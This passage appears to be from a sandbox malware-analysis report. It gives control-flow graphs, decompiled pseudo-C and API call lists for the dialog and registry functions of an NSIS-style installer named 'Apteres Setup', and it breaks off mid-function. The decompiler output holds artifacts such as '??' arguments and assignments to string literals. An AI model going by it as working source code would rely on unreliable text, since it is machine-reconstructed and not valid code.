                                                                                                                                                                                            control_flow_graph 210 404e83-404e9c 211 404ea2-404ea8 210->211 212 405024-405036 210->212 211->212 213 404eae-404eb1 211->213 214 405038-405078 GetDlgItem * 2 call 405409 SetClassLongA call 401533 212->214 215 40507e-405092 212->215 216 404eb3-404ec8 SetWindowPos 213->216 217 404ecd-404ed0 213->217 214->215 219 4050d0-4050d5 call 4053d7 215->219 220 405094-405096 215->220 221 405010 216->221 222 404f20-404f26 217->222 223 404ed2-404ef1 ShowWindow 217->223 231 4050da-4050f9 219->231 226 4050c8-4050ca 220->226 227 405098-4050a3 call 401399 220->227 228 405014-40501f call 4055e0 221->228 232 404f42-404f45 222->232 233 404f28-404f3d DestroyWindow 222->233 223->228 230 404ef7-404f0d GetWindowLongA 223->230 226->219 229 405399 226->229 227->226 246 4050a5-4050c3 SendMessageA 227->246 244 40539b-4053a2 228->244 229->244 230->228 238 404f13-404f1b ShowWindow 230->238 239 4050fb-405106 call 401533 231->239 240 40510c-405112 231->240 242 404f47-404f55 SetWindowLongA 232->242 243 404f5a-404f60 232->243 241 40537d-405384 233->241 238->228 239->240 250 405118-40511a 240->250 251 405359-405372 DestroyWindow EndDialog 240->251 241->229 249 405386-405388 241->249 242->244 243->221 252 404f66-404f80 GetDlgItem 243->252 246->244 249->229 255 40538a-405393 ShowWindow 249->255 250->251 256 405120-405177 call 405d47 call 405409 * 3 GetDlgItem 250->256 253 405378 251->253 257 404f82-404f9b SendMessageA IsWindowEnabled 252->257 258 404fa5-404faa 252->258 253->241 255->229 286 405185-4051d4 ShowWindow KiUserCallbackDispatcher * 2 EnableWindow 256->286 287 405179-405181 256->287 257->229 262 404fa1 257->262 259 404fac-404fad 258->259 260 404faf-404fb2 258->260 263 404ff0-404ff5 call 4057dd 259->263 264 404fc1-404fc4 260->264 265 404fb4-404fbb 260->265 262->258 263->228 267 404ff7-40500a SendMessageA 264->267 269 404fc6-404fcd 264->269 265->267 268 404fbd-404fbf 265->268 267->221 268->263 273 404fdd-404fe6 call 401533 269->273 274 404fcf-404fdb call 401533 269->274 273->228 284 404fe8 273->284 283 404fee 274->283 283->263 284->283 288 4051d6-4051d7 286->288 289 4051d9 286->289 287->286 290 4051da-405205 GetSystemMenu EnableMenuItem SendMessageA 288->290 289->290 291 405207-40521c SendMessageA 290->291 292 40521e 290->292 293 405224-405268 call 4053f2 call 405b85 call 40690a lstrlenA call 405d47 SetWindowTextA call 401399 291->293 292->293 293->231 304 40526e-405270 293->304 304->231 305 405276-40527a 304->305 306 405299-4052ad DestroyWindow 305->306 307 40527c-405282 305->307 306->253 309 4052b3-4052e0 CreateDialogParamA 306->309 307->229 308 405288-40528e 307->308 308->231 310 405294 308->310 309->241 311 4052e6-40533d call 405409 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401399 309->311 310->229 311->229 316 40533f-405352 ShowWindow call 4053d7 311->316 318 405357 316->318 318->253
                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                            			E00404E83(struct HWND__* _a4, int _a8, signed int _a12, long _a16) {
				signed int _v32;
				struct HWND__* _v40;
				void* _v84;
				void* _v88;
				struct HWND__* _t49;
				signed int _t51;
				intOrPtr _t53;
				struct HWND__* _t56;
				signed int _t65;
				int _t75;
				struct HWND__* _t87;
				struct HWND__* _t106;
				struct HWND__* _t111;
				struct HWND__* _t118;
				int _t122;
				signed int _t131;
				struct HWND__* _t135;
				signed int _t137;
				struct HWND__* _t138;
				struct HWND__* _t139;
				struct HWND__* _t140;
				signed int _t141;
				long _t144;
				int _t147;
				struct HWND__* _t154;
				void* _t157;

				_t135 = _a4;
				_t141 = _a8;
				if(_t141 == 0x110 || _t141 == 0x408) {
					_t137 = _a12;
					 *0x4205e0 = _t137;
					__eflags = _t141 - 0x110;
					if(_t141 == 0x110) {
						 *0x4237f8 = _t135;
						 *0x4205ec = GetDlgItem(_t135, 1);
						_t111 = GetDlgItem(_t135, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x4205f0 = _t111;
						E00405409(_t135);
						SetClassLongA(_t135, 0xfffffff2,  *0x4237d8);
						 *0x4237ec = E00401533(4);
						_t137 = 1;
						 *0x4205e0 = 1;
					}
					_t49 =  *0x40a018; // 0x0
					_t144 = (_t49 << 6) +  *0x424020;
					__eflags = _t49;
					if(_t49 < 0) {
						L38:
						E004053D7(0x40b);
						while(1) {
							_t138 =  *0x40a018; // 0x0
							_t51 =  *0x4205e0;
							_t139 = _t138 + _t51;
							_t144 = _t144 + (_t51 << 6);
							 *0x40a018 = _t139;
							_t53 =  *0x424024;
							__eflags = _t139 - _t53;
							if(_t139 == _t53) {
								E00401533(1);
								_t53 =  *0x424024;
								_t139 =  *0x40a018; // 0x0
							}
							__eflags =  *0x4237ec; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags = _t139 - _t53;
							if(_t139 >= _t53) {
								break;
							}
							_push( *((intOrPtr*)(_t144 + 0x24)));
							_push(0x42c800);
							_a12 =  *((intOrPtr*)(_t144 + 0x14));
							E00405D47();
							_push( *((intOrPtr*)(_t144 + 0x20)));
							_push(0xfffffc19);
							E00405409(_t135);
							_push( *((intOrPtr*)(_t144 + 0x1c)));
							_push(0xfffffc1b);
							E00405409(_t135);
							_push( *((intOrPtr*)(_t144 + 0x28)));
							_push(0xfffffc1a);
							E00405409(_t135);
							_t140 = GetDlgItem(_t135, 3);
							_t65 = _v32;
							_v40 = _t140;
							__eflags =  *0x4240cc;
							if( *0x4240cc != 0) {
								_t65 = _t65 & 0xfffffefd | 0x00000004;
								__eflags = _t65;
								 *(_t157 + 0x2c) = _t65;
							}
							ShowWindow(_t140, _t65 & 0x00000008); // executed
							EnableWindow( *(_t157 + 0x28),  *(_t157 + 0x2c) & 0x00000100); // executed
							EnableWindow( *0x4205ec,  *(_t157 + 0x2c) & 0x00000002); // executed
							_t75 =  *(_t157 + 0x2c) & 0x00000004;
							 *(_t157 + 0x34) = _t75;
							EnableWindow( *0x4205f0, _t75);
							__eflags =  *(_t157 + 0x2c);
							if( *(_t157 + 0x2c) == 0) {
								_push(1);
							} else {
								_push(0);
							}
							EnableMenuItem(GetSystemMenu(_t135, 0), 0xf060, ??);
							SendMessageA( *(_t157 + 0x30), 0xf4, 0, 1);
							__eflags =  *0x4240cc;
							if( *0x4240cc == 0) {
								_push( *0x4205ec);
							} else {
								SendMessageA(_t135, 0x401, 2, 0);
								_push( *0x4205f0);
							}
							E004053F2();
							E0040690A("Apteres Setup: Installing", E00405B85());
							_push( *((intOrPtr*)(_t144 + 0x18)));
							_push(lstrlenA("Apteres Setup: Installing") + 0x41f5e0);
							E00405D47();
							SetWindowTextA(_t135, "Apteres Setup: Installing"); // executed
							_push(0);
							_t87 = E00401399( *((intOrPtr*)(_t144 + 8)));
							__eflags = _t87;
							if(_t87 != 0) {
								continue;
							} else {
								__eflags =  *_t144;
								if( *_t144 == 0) {
									continue;
								}
								__eflags =  *(_t144 + 4) - 5;
								if( *(_t144 + 4) != 5) {
									DestroyWindow( *0x4237dc); // executed
									 *0x4205e4 = _t144;
									__eflags =  *_t144;
									if( *_t144 <= 0) {
										L62:
										_t56 =  *0x4237dc; // 0x303f6
										goto L63;
									}
									_t56 = CreateDialogParamA( *0x4237f4,  *_t144 +  *0x4237d4 & 0x0000ffff, _t135,  *(0x40a01c +  *(_t144 + 4) * 4), _t144); // executed
									 *0x4237dc = _t56;
									__eflags = _t56;
									if(_t56 == 0) {
										goto L63;
									}
									_push( *((intOrPtr*)(_t144 + 0x2c)));
									_push(6);
									E00405409(_t56);
									GetWindowRect(GetDlgItem(_t135, 0x3fa), _t157 + 0x10);
									ScreenToClient(_t135, _t157 + 0x10);
									SetWindowPos( *0x4237dc, 0,  *(_t157 + 0x20),  *(_t157 + 0x20), 0, 0, 0x15);
									_push(0);
									E00401399( *((intOrPtr*)(_t144 + 0xc)));
									__eflags =  *0x4237ec; // 0x0
									if(__eflags != 0) {
										goto L66;
									}
									ShowWindow( *0x4237dc, 8); // executed
									E004053D7(0x405);
									goto L62;
								}
								__eflags =  *0x4240cc;
								if( *0x4240cc != 0) {
									goto L66;
								}
								__eflags =  *0x4240c0;
								if( *0x4240c0 != 0) {
									continue;
								}
								goto L66;
							}
						}
						DestroyWindow( *0x4237dc);
						 *0x4237f8 = 0;
						EndDialog(_t135,  *0x41f5dc);
						goto L62;
					} else {
						__eflags = _t137 - 1;
						if(_t137 != 1) {
							L37:
							__eflags =  *_t144;
							if( *_t144 == 0) {
								goto L66;
							}
							goto L38;
						}
						_push(0);
						_t106 = E00401399( *((intOrPtr*)(_t144 + 0x10)));
						__eflags = _t106;
						if(_t106 == 0) {
							goto L37;
						}
						SendMessageA( *0x4237dc, 0x40f, 0, 1);
						__eflags =  *0x4237ec; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					if(_t141 != 0x47) {
						__eflags = _t141 - 5;
						if(_t141 != 5) {
							__eflags = _t141 - 0x40d;
							if(_t141 != 0x40d) {
								__eflags = _t141 - 0x11;
								if(_t141 != 0x11) {
									__eflags = _t141 - 0x111;
									if(_t141 != 0x111) {
										goto L29;
									}
									_t136 = _a12;
									_t147 = _a12 & 0x0000ffff;
									_a8 = _t147;
									_t154 = GetDlgItem(_a4, _t147);
									__eflags = _t154;
									if(_t154 == 0) {
										L16:
										__eflags = _t147 - 1;
										if(_t147 != 1) {
											__eflags = _t147 - 3;
											if(_t147 != 3) {
												__eflags = _t147 - 2;
												if(_t147 != 2) {
													L28:
													SendMessageA( *0x4237dc, 0x111, _a12, _a16);
													goto L29;
												}
												__eflags =  *0x4240cc;
												if( *0x4240cc == 0) {
													_t118 = E00401533(3);
													__eflags = _t118;
													if(_t118 != 0) {
														goto L30;
													}
													 *0x41f5dc = 1;
													L26:
													_push(0x78);
													L27:
													E004057DD();
													goto L30;
												}
												E00401533(_t147);
												 *0x41f5dc = _t147;
												goto L26;
											}
											__eflags =  *0x40a018;
											if( *0x40a018 <= 0) {
												goto L28;
											}
											_push(0xffffffff);
											goto L27;
										}
										_push(1);
										goto L27;
									}
									SendMessageA(_t154, 0xf3, 0, 0);
									_t122 = IsWindowEnabled(_t154);
									__eflags = _t122;
									if(_t122 == 0) {
										L66:
										__eflags = 0;
										return 0;
									}
									_t147 = _a8;
									goto L16;
								}
								SetWindowLongA(_t135, 0, 0);
								return 1;
							}
							DestroyWindow( *0x4237dc);
							_t56 = _a12;
							 *0x4237dc = _t56;
							L63:
							__eflags =  *0x41f5d8;
							if( *0x41f5d8 == 0) {
								__eflags = _t56;
								if(_t56 != 0) {
									ShowWindow(_t135, 0xa); // executed
									 *0x41f5d8 = 1;
								}
							}
							goto L66;
						}
						_t136 = _a12;
						asm("sbb eax, eax");
						ShowWindow( *0x4205e8,  ~(_t136 - 1) & _t141);
						__eflags = _t136 - 2;
						if(_t136 == 2) {
							_t131 = GetWindowLongA(_a4, 0xfffffff0);
							__eflags = (_t131 & 0x21010000) - 0x1000000;
							if((_t131 & 0x21010000) == 0x1000000) {
								ShowWindow(_a4, 4);
							}
						}
						goto L30;
					} else {
						SetWindowPos( *0x4205e8, _t135, 0, 0, 0, 0, 0x13);
						L29:
						_t136 = _a12;
						L30:
						return E004055E0(_t141, _t136, _a16);
					}
				}
			}





























                                                                                                                                                                                            0x00404e8c
                                                                                                                                                                                            0x00404e95
                                                                                                                                                                                            0x00404e9c
                                                                                                                                                                                            0x00405024
                                                                                                                                                                                            0x0040502e
                                                                                                                                                                                            0x00405034
                                                                                                                                                                                            0x00405036
                                                                                                                                                                                            0x0040503a
                                                                                                                                                                                            0x00405045
                                                                                                                                                                                            0x0040504a
                                                                                                                                                                                            0x0040504c
                                                                                                                                                                                            0x0040504e
                                                                                                                                                                                            0x00405051
                                                                                                                                                                                            0x00405056
                                                                                                                                                                                            0x00405064
                                                                                                                                                                                            0x00405071
                                                                                                                                                                                            0x00405076
                                                                                                                                                                                            0x00405078
                                                                                                                                                                                            0x00405078
                                                                                                                                                                                            0x0040507e
                                                                                                                                                                                            0x0040508a
                                                                                                                                                                                            0x00405090
                                                                                                                                                                                            0x00405092
                                                                                                                                                                                            0x004050d0
                                                                                                                                                                                            0x004050d5
                                                                                                                                                                                            0x004050da
                                                                                                                                                                                            0x004050da
                                                                                                                                                                                            0x004050e0
                                                                                                                                                                                            0x004050e5
                                                                                                                                                                                            0x004050ea
                                                                                                                                                                                            0x004050ec
                                                                                                                                                                                            0x004050f2
                                                                                                                                                                                            0x004050f7
                                                                                                                                                                                            0x004050f9
                                                                                                                                                                                            0x004050fc
                                                                                                                                                                                            0x00405101
                                                                                                                                                                                            0x00405106
                                                                                                                                                                                            0x00405106
                                                                                                                                                                                            0x0040510c
                                                                                                                                                                                            0x00405112
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405118
                                                                                                                                                                                            0x0040511a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405120
                                                                                                                                                                                            0x00405126
                                                                                                                                                                                            0x0040512b
                                                                                                                                                                                            0x0040512f
                                                                                                                                                                                            0x00405134
                                                                                                                                                                                            0x00405137
                                                                                                                                                                                            0x0040513d
                                                                                                                                                                                            0x00405142
                                                                                                                                                                                            0x00405145
                                                                                                                                                                                            0x0040514b
                                                                                                                                                                                            0x00405150
                                                                                                                                                                                            0x00405153
                                                                                                                                                                                            0x00405159
                                                                                                                                                                                            0x00405167
                                                                                                                                                                                            0x00405169
                                                                                                                                                                                            0x0040516d
                                                                                                                                                                                            0x00405171
                                                                                                                                                                                            0x00405177
                                                                                                                                                                                            0x0040517e
                                                                                                                                                                                            0x0040517e
                                                                                                                                                                                            0x00405181
                                                                                                                                                                                            0x00405181
                                                                                                                                                                                            0x0040518a
                                                                                                                                                                                            0x0040519e
                                                                                                                                                                                            0x004051b2
                                                                                                                                                                                            0x004051bc
                                                                                                                                                                                            0x004051c6
                                                                                                                                                                                            0x004051ca
                                                                                                                                                                                            0x004051d0
                                                                                                                                                                                            0x004051d4
                                                                                                                                                                                            0x004051d9
                                                                                                                                                                                            0x004051d6
                                                                                                                                                                                            0x004051d6
                                                                                                                                                                                            0x004051d6
                                                                                                                                                                                            0x004051e8
                                                                                                                                                                                            0x004051f9
                                                                                                                                                                                            0x004051ff
                                                                                                                                                                                            0x00405205
                                                                                                                                                                                            0x0040521e
                                                                                                                                                                                            0x00405207
                                                                                                                                                                                            0x00405210
                                                                                                                                                                                            0x00405216
                                                                                                                                                                                            0x00405216
                                                                                                                                                                                            0x00405224
                                                                                                                                                                                            0x00405234
                                                                                                                                                                                            0x00405239
                                                                                                                                                                                            0x0040524b
                                                                                                                                                                                            0x0040524c
                                                                                                                                                                                            0x00405257
                                                                                                                                                                                            0x0040525d
                                                                                                                                                                                            0x00405261
                                                                                                                                                                                            0x00405266
                                                                                                                                                                                            0x00405268
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040526e
                                                                                                                                                                                            0x0040526e
                                                                                                                                                                                            0x00405270
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405276
                                                                                                                                                                                            0x0040527a
                                                                                                                                                                                            0x0040529f
                                                                                                                                                                                            0x004052a5
                                                                                                                                                                                            0x004052ab
                                                                                                                                                                                            0x004052ad
                                                                                                                                                                                            0x00405378
                                                                                                                                                                                            0x00405378
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405378
                                                                                                                                                                                            0x004052d3
                                                                                                                                                                                            0x004052d9
                                                                                                                                                                                            0x004052de
                                                                                                                                                                                            0x004052e0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004052e6
                                                                                                                                                                                            0x004052e9
                                                                                                                                                                                            0x004052ec
                                                                                                                                                                                            0x00405303
                                                                                                                                                                                            0x0040530f
                                                                                                                                                                                            0x00405328
                                                                                                                                                                                            0x0040532e
                                                                                                                                                                                            0x00405332
                                                                                                                                                                                            0x00405337
                                                                                                                                                                                            0x0040533d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405347
                                                                                                                                                                                            0x00405352
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405352
                                                                                                                                                                                            0x0040527c
                                                                                                                                                                                            0x00405282
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405288
                                                                                                                                                                                            0x0040528e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405294
                                                                                                                                                                                            0x00405268
                                                                                                                                                                                            0x0040535f
                                                                                                                                                                                            0x0040536b
                                                                                                                                                                                            0x00405372
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405094
                                                                                                                                                                                            0x00405094
                                                                                                                                                                                            0x00405096
                                                                                                                                                                                            0x004050c8
                                                                                                                                                                                            0x004050c8
                                                                                                                                                                                            0x004050ca
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004050ca
                                                                                                                                                                                            0x00405098
                                                                                                                                                                                            0x0040509c
                                                                                                                                                                                            0x004050a1
                                                                                                                                                                                            0x004050a3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004050b2
                                                                                                                                                                                            0x004050ba
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004050c0
                                                                                                                                                                                            0x00404eae
                                                                                                                                                                                            0x00404eb1
                                                                                                                                                                                            0x00404ecd
                                                                                                                                                                                            0x00404ed0
                                                                                                                                                                                            0x00404f20
                                                                                                                                                                                            0x00404f26
                                                                                                                                                                                            0x00404f42
                                                                                                                                                                                            0x00404f45
                                                                                                                                                                                            0x00404f5a
                                                                                                                                                                                            0x00404f60
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404f66
                                                                                                                                                                                            0x00404f6a
                                                                                                                                                                                            0x00404f72
                                                                                                                                                                                            0x00404f7c
                                                                                                                                                                                            0x00404f7e
                                                                                                                                                                                            0x00404f80
                                                                                                                                                                                            0x00404fa5
                                                                                                                                                                                            0x00404fa8
                                                                                                                                                                                            0x00404faa
                                                                                                                                                                                            0x00404faf
                                                                                                                                                                                            0x00404fb2
                                                                                                                                                                                            0x00404fc1
                                                                                                                                                                                            0x00404fc4
                                                                                                                                                                                            0x00404ff7
                                                                                                                                                                                            0x0040500a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040500a
                                                                                                                                                                                            0x00404fc6
                                                                                                                                                                                            0x00404fcd
                                                                                                                                                                                            0x00404fdf
                                                                                                                                                                                            0x00404fe4
                                                                                                                                                                                            0x00404fe6
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404fe8
                                                                                                                                                                                            0x00404fee
                                                                                                                                                                                            0x00404fee
                                                                                                                                                                                            0x00404ff0
                                                                                                                                                                                            0x00404ff0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404ff0
                                                                                                                                                                                            0x00404fd0
                                                                                                                                                                                            0x00404fd5
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404fd5
                                                                                                                                                                                            0x00404fb4
                                                                                                                                                                                            0x00404fbb
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404fbd
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404fbd
                                                                                                                                                                                            0x00404fac
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404fac
                                                                                                                                                                                            0x00404f8c
                                                                                                                                                                                            0x00404f93
                                                                                                                                                                                            0x00404f99
                                                                                                                                                                                            0x00404f9b
                                                                                                                                                                                            0x00405399
                                                                                                                                                                                            0x00405399
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405399
                                                                                                                                                                                            0x00404fa1
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404fa1
                                                                                                                                                                                            0x00404f4c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404f54
                                                                                                                                                                                            0x00404f2e
                                                                                                                                                                                            0x00404f34
                                                                                                                                                                                            0x00404f38
                                                                                                                                                                                            0x0040537d
                                                                                                                                                                                            0x0040537d
                                                                                                                                                                                            0x00405384
                                                                                                                                                                                            0x00405386
                                                                                                                                                                                            0x00405388
                                                                                                                                                                                            0x0040538d
                                                                                                                                                                                            0x00405393
                                                                                                                                                                                            0x00405393
                                                                                                                                                                                            0x00405388
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405384
                                                                                                                                                                                            0x00404ed2
                                                                                                                                                                                            0x00404ee1
                                                                                                                                                                                            0x00404eec
                                                                                                                                                                                            0x00404eee
                                                                                                                                                                                            0x00404ef1
                                                                                                                                                                                            0x00404efd
                                                                                                                                                                                            0x00404f08
                                                                                                                                                                                            0x00404f0d
                                                                                                                                                                                            0x00404f19
                                                                                                                                                                                            0x00404f19
                                                                                                                                                                                            0x00404f0d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404eb3
                                                                                                                                                                                            0x00404ec2
                                                                                                                                                                                            0x00405010
                                                                                                                                                                                            0x00405010
                                                                                                                                                                                            0x00405014
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040501a
                                                                                                                                                                                            0x00404eb1

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404EC2
                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00404EEC
                                                                                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404EFD
                                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00404F19
                                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00405040
                                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 0040504A
                                                                                                                                                                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00405064
                                                                                                                                                                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 004050B2
                                                                                                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00405161
                                                                                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 0040518A
                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040519E
                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?), ref: 004051B2
                                                                                                                                                                                            • EnableWindow.USER32(?), ref: 004051CA
                                                                                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004051E1
                                                                                                                                                                                            • EnableMenuItem.USER32(00000000), ref: 004051E8
                                                                                                                                                                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 004051F9
                                                                                                                                                                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00405210
                                                                                                                                                                                            • lstrlenA.KERNEL32(Apteres Setup: Installing,?,Apteres Setup: Installing,00000000), ref: 00405241
                                                                                                                                                                                              • Part of subcall function 00405D47: lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,00405BD7,Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,?,C:\Users\user\Desktop,?,00000000), ref: 00405F22
                                                                                                                                                                                            • SetWindowTextA.USER32(?,Apteres Setup: Installing), ref: 00405257
                                                                                                                                                                                              • Part of subcall function 00401399: MulDiv.KERNEL32(00000025,00007530,00000000), ref: 004013F9
                                                                                                                                                                                              • Part of subcall function 00401399: SendMessageA.USER32(?,00000402,00000000), ref: 00401409
                                                                                                                                                                                            • DestroyWindow.USER32(?,00000000), ref: 0040529F
                                                                                                                                                                                            • CreateDialogParamA.USER32(?,?,-00424020), ref: 004052D3
                                                                                                                                                                                              • Part of subcall function 00405409: SetDlgItemTextA.USER32(?,?,00000000), ref: 00405423
                                                                                                                                                                                            • GetDlgItem.USER32(?,000003FA), ref: 004052FC
                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00405303
                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 0040530F
                                                                                                                                                                                            • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405328
                                                                                                                                                                                            • ShowWindow.USER32(00000008,?,00000000), ref: 00405347
                                                                                                                                                                                              • Part of subcall function 004053D7: SendMessageA.USER32(000303F6,00000000,00000000,00000000), ref: 004053E9
                                                                                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040538D
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                                                                                                                                                                                            • String ID: Apteres Setup: Installing
                                                                                                                                                                                            • API String ID: 162979904-650456579
                                                                                                                                                                                            • Opcode ID: 0cb2d12f5d873a4b77e769bd9eb00e915caa25e512eb6fcaef982074c44baa0a
                                                                                                                                                                                            • Instruction ID: 88e67709133a50504c5123ec964520371c3c2c079e1801d3c4f78987a69d3372
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cb2d12f5d873a4b77e769bd9eb00e915caa25e512eb6fcaef982074c44baa0a
                                                                                                                                                                                            • Instruction Fuzzy Hash: A4D1B1B1600711BBCB219F21ED48E2B7AA8FB84355F40453EF645B21E1CB389852DFAD
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 004058C3 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 216stringregistryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 319 4058c3-4058db call 4066e5 322 4058dd-4058ed call 406408 319->322 323 4058ef-40591b call 406776 319->323 332 40593e-405967 call 405804 call 406421 322->332 327 405933-405939 lstrcatA 323->327 328 40591d-40592e call 406776 323->328 327->332 328->327 337 4059f1-4059f9 call 406421 332->337 338 40596d-405972 332->338 343 405a07-405a35 LoadImageA 337->343 344 4059fb-405a02 call 405d47 337->344 338->337 339 405974-40599a call 406776 338->339 339->337 346 40599c-40599e 339->346 348 405ab4-405abc call 401533 343->348 349 405a37-405a62 RegisterClassA 343->349 344->343 350 4059a0-4059ad call 4063e4 346->350 351 4059af-4059bc lstrlenA 346->351 362 405ac2-405acd call 405804 348->362 363 405b6e-405b70 348->363 352 405a64-405a66 349->352 353 405a6b-405aaf SystemParametersInfoA CreateWindowExA 349->353 350->351 356 4059e4-4059ec call 406346 call 40690a 351->356 357 4059be-4059cc lstrcmpiA 351->357 358 405b71-405b78 352->358 353->348 356->337 357->356 361 4059ce-4059d8 GetFileAttributesA 357->361 365 4059da-4059dc 361->365 366 4059de-4059df call 406ac2 361->366 372 405ad3-405aed ShowWindow call 40604a 362->372 373 405b55-405b56 call 4056e9 362->373 363->358 365->356 365->366 366->356 378 405af9-405b0a GetClassInfoA 372->378 379 405aef-405af4 call 40604a 372->379 376 405b5b-405b5d 373->376 380 405b79-405b7b call 401533 376->380 381 405b5f-405b65 376->381 384 405b22-405b45 DialogBoxParamA call 401533 378->384 385 405b0c-405b20 GetClassInfoA RegisterClassA 378->385 379->378 387 405b80 380->387 381->363 386 405b67-405b69 call 401533 381->386 390 405b4a-405b53 call 403c2a 384->390 385->384 386->363 387->387 390->358
                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                            			E004058C3(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				intOrPtr* _t16;
				void* _t24;
				void* _t26;
				void* _t27;
				int _t28;
				int _t33;
				int _t34;
				intOrPtr _t35;
				int _t38;
				struct HINSTANCE__* _t45;
				int _t52;
				char _t59;
				CHAR* _t62;
				signed char _t66;
				void* _t75;
				intOrPtr _t77;
				intOrPtr _t78;
				CHAR* _t83;
				CHAR* _t84;
				CHAR* _t85;

				_t74 = __ecx;
				_t78 =  *0x424010;
				_t16 = E004066E5(2);
				_t88 = _t16;
				if(_t16 == 0) {
					"1033" = 0x7830;
					 *0x42b002 = 0;
					E00406776(__ecx, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x41f5e0, 0);
